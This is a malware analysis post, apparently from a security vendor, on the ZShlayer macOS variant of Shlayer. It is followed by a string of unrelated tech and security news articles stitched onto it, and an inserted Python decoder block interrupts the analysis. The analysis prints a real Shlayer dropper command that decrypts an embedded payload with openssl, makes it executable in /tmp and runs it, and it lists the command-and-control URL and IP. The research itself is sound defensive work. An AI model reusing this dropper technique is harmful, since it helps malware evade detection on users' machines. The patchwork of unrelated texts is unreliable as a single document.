Coming Out of Your Shell: From Shlayer to ZShlayer

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c 'tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l'

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it has not been notarized, indicating that the malware is either intended as a payload for 10.14 or earlier installations or that victims will have to be socially engineered to override the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this sample as our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to be:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon.

In BBEdit or a similar text editor, we can simply search and replace every semicolon with a semicolon followed by a newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the line breaks to local disk so that we can use it as input to a Python script for decoding. Our script will first of all replace all the variable names with the actual Unicode values. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the Unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:
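The three decoding steps described above (break the script at every semicolon, substitute each variable name with its defined value, then render the escape sequences the way printf would) as an added Python example. This is not the post's ZShlayer_decode.py, and the obfuscated script it decodes (SAMPLE_SCRIPT) is a constructed stand-in that uses the same variable-concatenation trick, not a real ZShlayer sample.

```python
"""Decode a ZShlayer-style obfuscated Zsh first stage.

Added example for this post; it is NOT the ZShlayer_decode.py script the
post links to, and SAMPLE_SCRIPT below is a constructed stand-in that uses
the same trick (Unicode escapes spread across many variables, glued together
into one variable that is then eval'd), not a real sample.
"""
import re

# Constructed sample, not real malware: a handful of variables holding
# "\uXXXX" escapes, one nested reference (Jd), and an eval of TWm at the end.
SAMPLE_SCRIPT = (
    "#!/bin/zsh\n"
    "pQ='\\u0065\\u0063';Lk='\\u0068\\u006f';wR='\\u0020';"
    "Ha='\\u0068';Ib='\\u0069';Jd=\"${Ha}${Ib}\";"
    "TWm=\"$pQ$Lk$wR${Jd}\";eval \"$(printf \"$TWm\")\""
)

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
EVAL_RE = re.compile(r"\beval\b.*?\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
ESC_RE = re.compile(r"\\u([0-9A-Fa-f]{4})|\\x([0-9A-Fa-f]{2})|\\([nt\\])")


def split_statements(script: str) -> str:
    """Step 1 of the post: a newline after every ';' so each command is visible."""
    return script.replace(";", ";\n")


def unquote(raw: str) -> str:
    """Strip one layer of matching single or double quotes from a value."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
        return raw[1:-1]
    return raw


def parse_assignments(script: str) -> dict:
    """Collect every NAME=value definition in the script (last one wins)."""
    env = {}
    for line in split_statements(script).splitlines():
        m = ASSIGN_RE.match(line.strip().rstrip(";"))
        if m:
            env[m.group(1)] = unquote(m.group(2))
    return env


def find_executed_var(script: str):
    """Name of the variable handed to eval (TWm in the post), or None."""
    for line in split_statements(script).splitlines():
        m = EVAL_RE.search(line)
        if m:
            return m.group(1)
    return None


def expand(value: str, env: dict, depth: int = 0) -> str:
    """Step 2: replace $NAME / ${NAME} with the defined value, recursively."""
    if depth > 100:
        raise ValueError("variable references nest too deeply (cycle?)")

    def repl(m):
        name = m.group(1)
        if name not in env:  # e.g. $HOME: not defined in the script, leave it
            return m.group(0)
        return expand(env[name], env, depth + 1)

    return VAR_RE.sub(repl, value)


def decode_escapes(text: str) -> str:
    """Step 3: what printf would do with \\uXXXX, \\xXX, \\n, \\t and \\\\."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return {"n": "\n", "t": "\t", "\\": "\\"}[m.group(3)]
    return ESC_RE.sub(repl, text)


def decode_script(script: str) -> str:
    """Run the three steps and return the plaintext of the eval'd command."""
    if not script.startswith("#!"):
        raise ValueError("no shebang: is this really a shell script?")
    env = parse_assignments(script)
    target = find_executed_var(script)
    if target is None or target not in env:
        raise ValueError("could not find the variable passed to eval")
    return decode_escapes(expand(env[target], env))


if __name__ == "__main__":
    import sys
    # Decode a saved first-stage script given on the command line, or the sample.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCRIPT
    print(decode_script(src))
```

The decoded text is only printed, never executed; on a real sample it should reveal the openssl/tail Bash second stage the post describes.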

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note that the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active, responding with an HTTP 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a reputation score of 0/58 on VT.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts

Parent DMGs

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google Cloud launches its Business Application Platform based on Apigee and AppSheet

Unlike some of its competitors, Google Cloud has recently started emphasizing how its large lineup of different services can be combined to solve common business problems. Instead of trying to sell individual services, Google is focusing on solutions and the latest effort here is what it calls its Business Application Platform, which combines the API management capabilities of Apigee with the no-code application development platform of AppSheet, which Google acquired earlier this year.

As part of this process, Google is also launching a number of new features for both services today. The company is launching the beta of a new API Gateway, built on top of the open-source Envoy project, for example. This is a fully managed service that is meant to make it easier for developers to secure and manage their API across Google’s cloud computing services and serverless offerings like Cloud Functions and Cloud Run. The new gateway, which has been in alpha for a while now, offers all the standard features you’d expect, including authentication, key validation and rate limiting.

As for its low-code service AppSheet, the Google Cloud team is now making it easier to bring in data from third-party applications thanks to the general availability to Apigee as a data source for the service. AppSheet already supported standard sources like MySQL, Salesforce and G Suite, but this new feature adds a lot of flexibility to the service.

With more data comes more complexity, so AppSheet is also launching new tools for automating processes inside the service today, thanks to the early access launch of AppSheet Automation. Like the rest of AppSheet, the promise here is that developers won’t have to write any code. Instead, AppSheet Automation provides a visual interface, that, according to Google, “provides contextual suggestions based on natural language inputs.” 

“We are confident the new category of business application platforms will help empower both technical and line of business developers with the core ability to create and extend applications, build and automate workflows, and connect and modernize applications,” Google notes in today’s announcement. And indeed, this looks like a smart way to combine the no-code environment of AppSheet with the power of Apigee .

Progress snags software automation platform Chef for $220M

Progress, a Boston-area developer tool company, boosted its offerings in a big way today when it announced it was acquiring software automation platform Chef for $220 million.

Chef, which went 100% open source last year, had annual recurring revenue (ARR) of $70 million from the commercial side of the house. Needless to say, Progress CEO Yogesh Gupta was happy to bring the company into the fold and gain not only that revenue, but a set of highly skilled employees, a strong developer community and an impressive customer list.

Gupta said that Chef fits with his company’s acquisition philosophy. “This acquisition perfectly aligns with our growth strategy and meets the requirements that we’ve previously laid out: a strong recurring revenue model, technology that complements our business, a loyal customer base and the ability to leverage our operating model and infrastructure to run the business more efficiently,” he said in a statement.

Chef CEO Barry Crist offered a typical argument for an acquired company; that Progress offered a better path to future growth, while sending a message to the open-source community and customers that Progress would be a good steward of the startup’s vision.

“For Chef, this acquisition is our next chapter, and Progress will help enhance our growth potential, support our Open Source vision, and provide broader opportunities for our customers, partners, employees and community,” Crist said in a statement.

Chef’s customer list is certainly impressive, and includes tech industry stalwarts like Facebook, IBM and SAP, as well as non-tech companies like Nordstrom, Alaska Airlines and Capital One.

The company was founded in 2008 and had raised $105 million, according to Crunchbase data. It hadn’t raised any funds since 2015, when it raised a $40 million Series E led by DFJ Growth. Other investors along the way included Battery Ventures, Ignition Partners and Scale Venture Partners.

The transaction is expected to close next month, pending normal regulatory approvals.

The $10B JEDI contract is locked, loaded and still completely stuck

The other day I took a moment to count the number of stories we’ve done on TechCrunch on the DoD’s $10 billion, decade-long, winner-take-all, JEDI cloud contract. This marks the 30th time we’ve written about this deal over the last two years, and it comes after a busy week last week in JEDI cloud contract news.

That we’re still writing about this is fairly odd if you consider the winner was announced last October when the DoD chose Microsoft, but there is no end in sight to the on-going drama that is this procurement process.

Government contracts don’t typically catch our attention at TechCrunch, but this one felt different early on. There was the size and scope of the deal of course. There was the cute play on the “Star Wars” theme. There was Oracle acting like a batter complaining to the umpire before the first pitch was thrown. There was the fact that everyone thought Amazon would win until it didn’t.

There was a lot going on. In fact, there’s still a lot going on with this story.

Oracle doth protest too much

Let’s start with Oracle, which dispatched CEO Safra Catz to the White House in April 2018 even before the RFP had been written. She was setting the stage to complain that the deal was going to be set up to favor Amazon, something that Oracle alleged until the day Microsoft was picked the winner.

Catz had been on the Trump transition team and so had the ear of the president. While the president certainly interjected himself in this process, it’s not known how much influence that particular meeting might have had. Suffice to say that it was only the first volley in Oracle’s long war against the JEDI contract procurement process.

It would include official complaints with the Government Accountability Office and a federal lawsuit worth not coincidentally $10 billion. It would claim the contract favored Amazon. It would argue that the one-vendor approach wasn’t proper. It would suggest that because the DoD had some former Amazon employees helping write the RFP, that it somehow favored Amazon. The GAO and two court cases found otherwise, ruling against Oracle every single time.

It’s worth noting that the Court of Appeals ruling last week indicated that Oracle didn’t even meet some of the basic contractual requirements, all the while complaining about the process itself from the start.

Amazon continues to press protests

Nobody was more surprised that Amazon lost the deal than Amazon itself. It still believes to this day that it is technically superior to Microsoft and that it can offer the DoD the best approach. The DoD doesn’t agree. On Friday, it reaffirmed its choice of Microsoft. But that is not the end of this, not by a long shot.

Amazon has maintained since the decision was made last October that the decision-making process had been tainted by presidential interference in the process. They believe that because of the president’s personal dislike of Amazon CEO Jeff Bezos, who also owns the Washington Post, he inserted himself in the process to prevent Bezos’ company from winning that deal.

In January, Amazon filed a motion to stop work on the project until this could all be sorted out. In February, a judge halted work on the project until Amazon’s complaints could be heard by the court. It is September and that order is still in place.

In a blog post on Friday, Amazon reiterated its case, which is based on presidential interference and what it believes is technical superiority. “In February, the Court of Federal Claims stopped performance on JEDI. The Court determined AWS’s protest had merit, and that Microsoft’s proposal likely failed to meet a key solicitation requirement and was likely deficient and ineligible for award. Our protest detailed how pervasive these errors were (impacting all six technical evaluation factors), and the Judge stopped the DoD from moving forward because the very first issue she reviewed demonstrated serious flaws,” Amazon wrote in the post.

Microsoft for the win?

Microsoft on the other hand went quietly about its business throughout this process. It announced Azure Stack, a kind of portable cloud that would work well as a field operations computer system. It beefed up its government security credentials.

Even though Microsoft didn’t agree with the one-vendor approach, indicating that the government would benefit more from the multivendor approach many of its customers were taking, it made clear if those were the rules, it was in it to win it — and win it did, much to the surprise of everyone, especially Amazon.

Yet here we are, almost a year later and in spite of the fact that the DoD found once again, after further review, that Microsoft is still the winner, the contract remains in limbo. Until that pending court case is resolved, we will continue to watch and wait and wonder if this will ever be truly over, and the JEDI cloud contract will actually be implemented.

Hasura raises $25 million Series B and adds MySQL support to its GraphQL service

Hasura, a service that provides developers with an open-source engine that provides them a GraphQL API to access their databases, today announced that it has raised a $25 million Series B round led by Lightspeed Venture Partners. Previous investors Vertex Ventures US, Nexus Venture Partners, Strive VC and SAP.iO Fund also participated in this round.

The new round, which the team raised after the COVID-19 pandemic had already started, comes only six months after the company announced its $9.9 million Series A round. In total, Hasura has now raised $36.5 million.

“We’ve been seeing rapid enterprise traction in 2020. We’ve wanted to accelerate our efforts investing in the Hasura community and our cloud product that we recently launched and to ensure the success of our enterprise customers. Given the VC inbound interest, a fundraise made sense to help us step on the gas pedal and give us room to grow comfortably,” Hasura co-founder and CEO Tanmai Gopal told me.

In addition to the new funding, Hasura also today announced that it has added support for MySQL databases. Until now, the company’s service only worked with PostgreSQL databases.

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right).

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right). Image Credits: Hasura

As the company’s CEO and co-founder Tanmai Gopal told me, MySQL support has long been at the top of the most requested features by the service’s users. Many of these users — who are often in the healthcare and financial services industry — are also working with legacy systems they are trying to connect to modern applications and MySQL plays an important role there, given how long it has been around.

In addition to adding MySQL support, Hasura is also adding support for SQL Server to its lineup, but for now, that’s in early access.

“For MySQL and SQL Server, we’ve seen a lot of demand from our healthcare and financial services / fin-tech users,” Gopal said. “They have a lot of existing online data, especially in these two databases, that they want to activate to build new capabilities and use while modernizing their applications.

Today’s announcement also comes only a few months after the company launched a fully managed cloud service for its service, which complements its existing paid Pro service for enterprises.

“We’re very impressed by how developers have taken to Hasura and embraced the GraphQL approach to building applications,” said Gaurav Gupta, partner at Lightspeed Venture Partners and Hasura board member. “Particularly for front-end developers using technologies like React, Hasura makes it easy to connect applications to existing databases where all the data is without compromising on security and performance. Hasura provides a lovely bridge for re-platforming applications to cloud-native approaches, so we see this approach being embraced by enterprise developers as well as front-end developers more and more.”

The company plans to use the new funding to add support for more databases and to tackle some of the harder technical challenges around cross-database joins and the company’s application-level data caching system. “We’re also investing deeply in company building so that we can grow our GTM and engineering in tandem and making some senior hires across these functions,” said Gopal.

Microsoft Patch Tuesday, Sept. 2020 Edition

Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users.

The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.

Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server.

“That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” said Dustin Childs, of Trend Micro’s Zero Day Initiative. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon. This should be your top priority.”

Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019.

Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future.

Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates.

Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.

Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

The Good, the Bad and the Ugly in Cybersecurity – Week 36

The Good

A Colorado man named Bryan Connor Herrell, who worked as a moderator on the now defunct Darknet site “AlphaBay Market”, was sentenced to 11 years in prison by the U.S. District Court.

The site, which was taken down in a joint operation by the FBI along with Thai and Canadian police, served as a marketplace for buyers and sellers of guns, stolen identity information, credit card numbers and other illicit materials. At one time, AlphaBay was the world’s largest online drug marketplace. As a moderator, Herrell helped settle disputes between buyers and sellers. He was clearly dedicated to his work, helping to resolve over 20,000 such disputes.

Herrell’s capture came as a result of the site’s founder and admin Alexandre Cazes being arrested in Thailand in 2017. Cazes, who was subsequently found dead in his prison cell only a few days later, kept a laptop full of incriminating evidence. The FBI had seized the device and were able to retrieve troves of information related to the site’s infrastructure and staff, including the involvement of Herrell. While Herrell’s trial took several years to conclude, the sentence is severe and should serve as warning to others interested in exploring the murky paths of the criminal underground.

Other good news this week comes from Facebook and Twitter, both of which suspended several accounts affiliated with Russian State actors. The accounts belonged to “PeaceData”, a fake news website publishing misleading articles about world politics.

The two social networks said they started an investigation into accounts associated with the site after they received a tip from the FBI earlier this summer. The information was passed also to an independent research body Graphika, which confirmed that the site and associated social media assets were linked to the infamous Russian troll farm “Internet Research Agency” (IRA).

Hopefully, this action is a sign of social media platforms starting to take a more determined stand against fake news and online manipulation.

The Bad

The Parliament of Norway, also known as “The Storting”, was the target of a cyber attack this week that breached the email accounts of several MPs and members of staff. Emails belonging to the Conservative party (Høyre) were among those hacked, but it is unknown at this point if the account of PM Erna Solberg or any government ministers were affected. The opposition Labour party (Arbeiderpartiet) email account was also hacked, suggesting the attack was conducted by an external perpetrator.

“This has been a significant attack,” said Marianne Andreassen, the parliament’s non-elected chief administrator. “Today’s threat situation is challenging, and IT security is something that we are always reviewing. New measures to reinforce security in the Storting are continually being assessed,” she added.

The Parliament has reported the incident to Norwegian police security service (PST), which then tweeted that they were investigating the case. The next Norwegian parliamentary election is scheduled to be held a year from now, in September 2021, and the fears are that this attack might be a prelude to foreign interference in next year’s election.

The Ugly

Still with politics and cybercrime, the Twitter account of the personal website of Indian Prime Minister Narendra Modi has also been hacked this week. The perpertators posted a series of tweets appealing to his 2.5 million followers to donate to the PM National Relief Fund with Bitcoin.

The tweets read, “I appeal to you all to donate generously to PM National Relief Fund for Covid-19, Now India begin with cryptocurrency.”

Subsequent tweets revealed the identity of the hackers to be a group called “John Wick” (referencing the movie franchise starring Keanu Reeves), which was accused earlier this week of hacking a famous Indian E-commerce website “Paytm Mall” and demanding a ransom. It appears that the hacking group wanted to clear its name and so hacked a high-profile Twitter account and used it to shout to the world that they were not to blame for the Paytm Mall hack.

Twitter is investigating the breach of the Indian PM’s account (the account has been reset since, and the hackers’ tweets deleted), which follows in the steps of the much publicized incident in July when hackers gained access to around 130 celebrity accounts, using them to tweet in concert in an attempt to get people to “donate” to a special Bitcoin wallet. This is another reminder that social media accounts of national and political leaders are high-value assets and need to be protected as such to reduce the risk of manipulation and misconduct on a national or even international level.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Teemyco creates virtual offices so you can grab a room and talk with colleagues

Meet Teemyco, a Stockholm-based startup that wants to reproduce office interactions in a virtual environment. The company wants to foster spontaneous interactions and casual collaboration with a room-based interface. Each employee moves from one room to another just like in a physical office.

If you’re no longer working from an office, chances are you rely heavily on email, Slack, Microsoft Teams, Zoom, Google Meet or a combination of all those tools. While those tools work perfectly fine for what they’re designed to achieve, many companies feel like important information is getting lost. It’s harder to bump into a colleague next to the coffee machine and ask a quick question.

With Teemyco, each person is working in a virtual room. By default, you work in the lobby. You can consider it as an open space with multiple desks. When you want to get together for a planned or unplanned meeting, you can pull someone from the lobby and create another room.

In that room, you can start an audio call or a video call. You can see your colleagues in the corner of your screen and stay focused on a document at the same time, or you can put a video call in full screen. When someone is done, they can leave the room.

Those interactions are less formal than what you get with video-conferencing services. You don’t have to send a link to a Zoom room, you don’t have to send a calendar invite. People hop in and hop out.

If you’re working on something important, you can move to a focus room so that you don’t get interrupted every 15 minutes. Other people won’t be able to pull you from your virtual desk. If you have to run some errands, you can also put yourself in a room that says you’re not there — those rooms can act as a status.

Teemyco also helps you work next to your favorite colleague. You can create a room and use a walkie-talkie feature for quick interactions throughout the day. And, of course, you can create a break room for non-work-related discussions.

Teemyco is still a young company. The product is only available in beta. The company raised a $1 million seed round led by Luminar Ventures with Antler, Gazella and various business angels also participating.

It’s also not going to work for all companies. I’m not sure it scales well for a company with hundreds of employees, for instance. Introverts might not be fans of real-time communication either.

If you’re a remote-first company, you know that it’s important to have a culture of transparency. And written information is always more transparent than video conferences.

And yet, depending on your corporate culture, something like Teemyco can be useful. It can augment information stored in shared documents and internal communication tools.

It’s an interesting product that proves that the inevitable debate between physical offices and remote teams is not a binary problem. There is some granularity, and companies can adjust the knob depending on specific needs.

DoD reaffirms Microsoft has won JEDI cloud contract, but Amazon legal complaints still pending

We have seen a lot of action this week as the DoD tries to finally determine the winner of the $10 billion, decade-long DoD JEDI cloud contract. Today, the DoD released a statement that, after reviewing the proposals from finalists Microsoft and Amazon again, it reiterated that Microsoft was the winner of the contract.

“The Department has completed its comprehensive re-evaluation of the JEDI Cloud proposals and determined that Microsoft’s proposal continues to represent the best value to the Government. The JEDI Cloud contract is a firm-fixed-price, indefinite-delivery/indefinite-quantity contract that will make a full range of cloud computing services available to the DoD,” the DoD said in a statement.

This comes on the heels of yesterday’s Court of Appeals decision denying Oracle’s argument that the procurement process was flawed and that there was a conflict of interest because a former Amazon employee helped write the requirements for the RFP.

While the DoD has determined that it believes Microsoft should still get the contract, after selecting the company last October, that doesn’t mean this is the end of the line for this long-running saga. In fact, a federal judge halted work on the project in February pending a hearing on an ongoing protest from Amazon. Amazon believes it should have won on merit, and that the president interfered with the procurement process to prevent Jeff Bezos, who owns The Washington Post, from getting the lucrative contract.

The DoD confirmed that the project could not begin until the legal wrangling was settled. “While contract performance will not begin immediately due to the Preliminary Injunction Order issued by the Court of Federal Claims on February 13, 2020, DoD is eager to begin delivering this capability to our men and women in uniform,” the DoD reported in a statement.

A Microsoft spokesperson said the company was ready to get to work on the project as soon as it got the OK to proceed. “We appreciate that after careful review, the DoD confirmed that we offered the right technology and the best value. We’re ready to get to work and make sure that those who serve our country have access to this much needed technology,” a Microsoft spokesperson told TechCrunch.

Meanwhile, in a blog post published late this afternoon, Amazon made it clear that it was unhappy with today’s outcome and will continue to pursue legal remedy for what they believe to be presidential interference that has threatened the integrity of the procurement process. Here’s how they concluded the blog post:

We strongly disagree with the DoD’s flawed evaluation and believe it’s critical for our country that the government and its elected leaders administer procurements objectively and in a manner that is free from political influence. The question we continue to ask ourselves is whether the President of the United States should be allowed to use the budget of the Department of Defense to pursue his own personal and political ends? Throughout our protest, we’ve been clear that we won’t allow blatant political interference, or inferior technology, to become an acceptable standard. Although these are not easy decisions to make, and we do not take them lightly, we will not back down in the face of targeted political cronyism or illusory corrective actions, and we will continue pursuing a fair, objective, and impartial review.

While today’s statement from the DoD appears to take us one step closer to the end of the road for this long-running drama, it won’t be over until the court rules on Amazon’s arguments. It’s clear from today’s blog post that Amazon has no intention of backing down.

Note: We have updated this story with content from an Amazon blog post responding to this news.

Avo raises $3M for its analytics governance platform

Avo, a startup that helps businesses better manage their data quality across teams, today announced that it has raised a $3 million seed round led by GGV Capital, with participation from Heavybit, Y Combinator and others.

The company’s founder, Stefania Olafsdóttir, who is currently based in Iceland, was previously the head of data science at QuizUp, which at some point had 100 million users around the world. “I had the opportunity to build up the Data Science Division, and that meant the cultural aspect of helping people ask and answer the right questions — and get them curious about data — but it also meant the technical part of setting up the infrastructure and tools and pipelines, so people can get the right answers when they need it,” she told me. “We were early adopters of self-serve product analytics and culture — and we struggled immensely with data reliability and data trust.”


As companies collect more data across products and teams, the process tends to become unwieldy and different teams end up using different methods (or just simply different tags), which creates inefficiencies and issues across the data pipeline.

“At first, that unreliable data just slowed down decision making, because people were just like, didn’t understand the data and needed to ask questions,” Olafsdóttir said about her time at QuizUp. “But then it caused us to actually launch bad product updates based on incorrect data.” Over time, that problem only became more apparent.

“Once organizations realize how big this issue is — that they’re effectively flying blind because of unreliable data, while their competition might be like taking the lead on the market — the default is to patch together a bunch of clunky processes and tools that partially increase the level of liability,” she said. And that clunky process typically involves a product manager and a spreadsheet today.

At its core, the Avo team set out to build a better process around this, and after a few detours and other product ideas, Olafsdóttir and her co-founders regrouped to focus on exactly this problem during their time in the Y Combinator program.

Avo gives developers, data scientists and product managers a shared workspace to develop and optimize their data pipelines. “Good product analytics is the product of collaboration between these cross-functional groups of stakeholders,” Olafsdóttir argues, and the goal of Avo is to give these groups a platform for their analytics planning and governance — and to set company-wide standards for how they create their analytics events.

Once that is done, Avo provides developers with typesafe analytics code and debuggers that allow them to take those snippets and add them to their code within minutes. For some companies, this new process can help them go from spending 10 hours on fixing a specific analytics issue to an hour or less.

Most companies, the team argues, know — deep down — that they can’t fully trust their data. But they also often don’t know how to fix this problem. To help them with this, Avo also today released its Inspector product. This tool processes event streams for a company, visualizes them and then highlights potential errors. These could be type mismatches, missing properties or other discrepancies. In many ways, that’s obviously a great sales tool for a service that aims to avoid exactly these problems.

One of Avo’s early customers is Rappi, the Latin American delivery service. “This year we scaled to meet the demand of 100,000 new customers digitizing their deliveries and curbside pickups. The problem with every new software release was that we’d break analytics. It represented 25% of our Jira tickets,” said Rappi’s head of Engineering, Damian Sima. “With Avo we create analytics schemas upfront, identify analytics issues fast, add consistency over time and ensure data reliability as we help customers serve the 12+ million monthly users their businesses attract.”

Like most startups at this stage, Avo plans to use the new funding to build out its team and continue to develop its product.

“The next trillion-dollar software market will be driven from the ground up, with developers deciding the tools they use to create digital transformation across every industry. Avo offers engineers ease of implementation while still retaining schemas and analytics governance for product leaders,” said GGV Capital Managing Partner Glenn Solomon. “Our investment in Avo is an investment in software developers as the new kingmakers and product leaders as the new oracles.”